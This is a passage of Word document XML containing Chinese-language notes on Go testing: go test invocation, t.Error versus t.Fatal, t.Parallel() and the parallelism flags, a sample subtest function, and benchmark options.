          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>命令默认不运行 benchmark</w:t>
      </w:r>
      <w:r w:rsidR="00E73167" w:rsidRPr="00E73167">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E73167" w:rsidRPr="00E73167">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>用例</w:t>
      </w:r>
      <w:r w:rsidR="00E73167">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，如果要运行，则需要加上</w:t>
      </w:r>
      <w:r w:rsidR="00E73167">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E73167" w:rsidRPr="00E73167">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">-bench </w:t>
      </w:r>
      <w:r w:rsidR="00E73167" w:rsidRPr="00E73167">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>参数</w:t>
      </w:r>
      <w:r w:rsidR="00E73167">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D261F32" w14:textId="77777777" w:rsidR="00F93951" w:rsidRDefault="00F93951" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A878B46" w14:textId="77777777" w:rsidR="00F93951" w:rsidRDefault="00F93951" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行当前</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> package </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内的用例：</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB3F01">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">go test example </w:t>
      </w:r>
      <w:r w:rsidRPr="00AB3F01">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB3F01">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> go test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF6A232" w14:textId="77777777" w:rsidR="00F93951" w:rsidRDefault="00F93951" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行子</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> package </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内的用例：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AB3F01">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">go test example/&lt;package name&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00AB3F01">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB3F01">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> go test ./&lt;package name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E75C1FF" w14:textId="3DC0EC72" w:rsidR="00A8659F" w:rsidRDefault="00F93951" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果想递归测试当前目录下的所有的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> package</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">go test ./... </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> go test example/...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3B9D9E" w14:textId="7926CCF6" w:rsidR="00273EAA" w:rsidRDefault="00273EAA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A39289B" w14:textId="7D05BFB9" w:rsidR="00273EAA" w:rsidRPr="006819F5" w:rsidRDefault="006819F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>专门的报错可以使用</w:t>
      </w:r>
      <w:r w:rsidRPr="006819F5">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>t.Error/t.Errorf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="006819F5">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>t.Fatal/t.Fatalf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，区别在于</w:t>
      </w:r>
      <w:r w:rsidRPr="006819F5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>前者遇错不停，还会继续执行其他的测试用例，后者遇错即停</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5422765D" w14:textId="49239EA2" w:rsidR="006819F5" w:rsidRDefault="006819F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76898650" w14:textId="00ED3200" w:rsidR="006819F5" w:rsidRDefault="00BD37AA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>了解</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD37AA">
        <w:t>t.Parallel()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的用法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A3C7E6" w14:textId="027E511F" w:rsidR="00BD37AA" w:rsidRDefault="00BD37AA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD37AA">
        <w:t>https://engineering.mercari.com/en/blog/entry/20220408-how_to_use_t_parallel/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3C9399" w14:textId="793006FD" w:rsidR="00BD37AA" w:rsidRDefault="006462A1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果只是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006462A1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>go test</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>而不加任何参数，测试将</w:t>
      </w:r>
      <w:r w:rsidRPr="006462A1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>顺序执行每个包的</w:t>
      </w:r>
      <w:r w:rsidRPr="006462A1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>test</w:t>
      </w:r>
      <w:r w:rsidRPr="006462A1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>代码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；如果指定</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006462A1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>-p 3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种参数，会同时并行运行几个包（是多包运行会并行运行，不是包内并行），</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最大指定</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cpu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的数量。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42891A8C" w14:textId="77777777" w:rsidR="001523F4" w:rsidRDefault="001523F4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BCD032F" w14:textId="2DE396A6" w:rsidR="00084D4C" w:rsidRDefault="00084D4C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>如果要</w:t>
      </w:r>
      <w:r w:rsidR="00830EB7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提高包内测试的并行性，需要使用</w:t>
      </w:r>
      <w:r w:rsidR="00830EB7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="00830EB7">
        <w:t>.Parallel()</w:t>
      </w:r>
      <w:r w:rsidR="00830EB7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法。</w:t>
      </w:r>
      <w:r w:rsidR="001523F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包内并行运行数量也是有限的，使用</w:t>
      </w:r>
      <w:r w:rsidR="001523F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001523F4" w:rsidRPr="003036D1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>-parallel n</w:t>
      </w:r>
      <w:r w:rsidR="001523F4" w:rsidRPr="003036D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>（该参数仅适用于单个测试文件内）</w:t>
      </w:r>
      <w:r w:rsidR="001523F4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001523F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来指定，如果没有设置值，则为</w:t>
      </w:r>
      <w:r w:rsidR="001523F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cpu</w:t>
      </w:r>
      <w:r w:rsidR="001523F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的最大值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5118D4B4" w14:textId="40A4E517" w:rsidR="0071313C" w:rsidRDefault="0071313C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10F58C2F" w14:textId="7CD08C8A" w:rsidR="0071313C" w:rsidRPr="0071313C" w:rsidRDefault="0071313C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0071313C">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>使用顺序</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460E7C4F" w14:textId="4B9606D9" w:rsidR="006462A1" w:rsidRPr="00DB7EBC" w:rsidRDefault="0071313C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB7EBC">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>没有声明</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB7EBC">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>t.Parallel()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB7EBC">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB7EBC">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Test</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB7EBC">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>方法会先运行，然后再并行运行声明了Parallel的Test用例。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA71F33" w14:textId="77777777" w:rsidR="0071313C" w:rsidRDefault="0071313C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55CFF57B" w14:textId="2493904E" w:rsidR="00273EAA" w:rsidRDefault="00D229FA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>常见写法</w:t>
      </w:r>
      <w:r w:rsidR="00181F01">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B1763A" w14:textId="48114F49" w:rsidR="00D229FA" w:rsidRDefault="00D229FA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1413C7F1" w14:textId="0C048441" w:rsidR="00B719A6" w:rsidRDefault="00B719A6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>// calc_test.go</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EA2EAF" w14:textId="77777777" w:rsidR="00B719A6" w:rsidRDefault="00B719A6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>func TestMul(</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC2F75">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>t *testing.T</w:t>
      </w:r>
      <w:r>
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140DCA04" w14:textId="77777777" w:rsidR="00B719A6" w:rsidRDefault="00B719A6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>t.Run("pos", func(t *testing.T) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700BB824" w14:textId="77777777" w:rsidR="00B719A6" w:rsidRDefault="00B719A6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>if Mul(2, 3) != 6 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA4423B" w14:textId="77777777" w:rsidR="00B719A6" w:rsidRDefault="00B719A6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009657E0">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>t.Fatal("fail")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E8FF10" w14:textId="201A32E5" w:rsidR="00B719A6" w:rsidRDefault="00B719A6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8DC548" w14:textId="77777777" w:rsidR="00B719A6" w:rsidRDefault="00B719A6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD62509" w14:textId="77777777" w:rsidR="00B719A6" w:rsidRDefault="00B719A6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>t.Run("neg", func(t *testing.T) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E57A7DB" w14:textId="77777777" w:rsidR="00B719A6" w:rsidRDefault="00B719A6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>if Mul(2, -3) != -6 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CF5161" w14:textId="77777777" w:rsidR="00B719A6" w:rsidRDefault="00B719A6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009657E0">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>t.Fatal("fail")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1371C165" w14:textId="77777777" w:rsidR="00B719A6" w:rsidRDefault="00B719A6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E14FA4A" w14:textId="77777777" w:rsidR="00B719A6" w:rsidRDefault="00B719A6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1B708B" w14:textId="55D29E02" w:rsidR="00D229FA" w:rsidRDefault="00B719A6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA0D0F8" w14:textId="677D96C7" w:rsidR="00273EAA" w:rsidRDefault="00273EAA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="580E4495" w14:textId="3669DE5F" w:rsidR="00273EAA" w:rsidRDefault="00273EAA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1684BEFA" w14:textId="7D9F35D6" w:rsidR="00273EAA" w:rsidRDefault="00273EAA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FE15BB6" w14:textId="63883074" w:rsidR="00273EAA" w:rsidRDefault="00273EAA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AB7BC16" w14:textId="75B7920C" w:rsidR="00273EAA" w:rsidRDefault="00273EAA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E6AD285" w14:textId="77777777" w:rsidR="00273EAA" w:rsidRDefault="00273EAA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E139BC8" w14:textId="615814DF" w:rsidR="00B23F0D" w:rsidRDefault="00D60420" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bench</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>性能测量</w:t>
      </w:r>
      <w:r w:rsidR="00331F09">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：指定</w:t>
      </w:r>
      <w:r w:rsidR="00331F09">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cpu</w:t>
      </w:r>
      <w:r w:rsidR="00331F09">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、测试用例、时间、次数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B258D46" w14:textId="38DCAEC3" w:rsidR="00A84582" w:rsidRDefault="008008BB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>生成的测试用例的方法名都是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bench</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开头的方法名。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13365997" w14:textId="7DC97726" w:rsidR="00A84582" w:rsidRDefault="00A84582" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>go test -bench</w:t>
      </w:r>
      <w:r w:rsidR="00925EF6">
        <w:t xml:space="preserve"> -benchtime=5s</w:t>
      </w:r>
      <w:r w:rsidR="00092C85">
        <w:t xml:space="preserve"> -benchmem</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-count</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535A6172" w14:textId="5E4BE71F" w:rsidR="00A84582" w:rsidRDefault="0015737C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>goland</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目前没有直接生成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Benchmark(</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的能力，可以先生成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，然后改为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Benchmark</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的测试函数。</w:t>
      </w:r>
      <w:r w:rsidR="002C67FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数体很简单，就是</w:t>
      </w:r>
      <w:r w:rsidR="002C67FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r w:rsidR="002C67FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>循环</w:t>
      </w:r>
      <w:r w:rsidR="002C67FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r w:rsidR="002C67FB">
        <w:t>.N</w:t>
      </w:r>
      <w:r w:rsidR="002C67FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就可以了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFE1586" w14:textId="4627B767" w:rsidR="003126CB" w:rsidRDefault="003126CB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="黑体" w:hAnsi="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DE65322" w14:textId="642F33DB" w:rsidR="003126CB" w:rsidRDefault="00475522" w:rsidP="009222EB">
